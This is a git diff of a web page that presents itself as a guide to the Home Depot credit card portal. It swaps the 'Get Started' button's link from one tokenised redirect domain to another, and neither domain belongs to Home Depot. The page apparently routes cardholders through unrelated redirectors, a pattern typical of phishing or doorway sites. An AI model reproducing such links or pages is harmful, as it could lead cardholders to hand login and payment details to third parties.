--- a/index.html
+++ b/index.html
@@ -150,7 +150,7 @@
         <p>Homedepot.com/mycard is the easy online portal for Home Depot credit cardholders to pay bills,
             check balances, and manage their accounts anytime.
         </p>
- <a href=" https://q82.net/?1s7clbwoqk9zIVc7c695GlqmTfKxxqtMFw6B8UkJolMiKmP7W" target="_blank" class="btn">Get Started</a>
+ <a href="   https://link72.com/?1s7clbwoqk9zIVc7c695GlqmTfKxxqtMFw6B8UkJolMiKmP7W" target="_blank" class="btn">Get Started</a>
     </section>
 
     <!-- Content -->
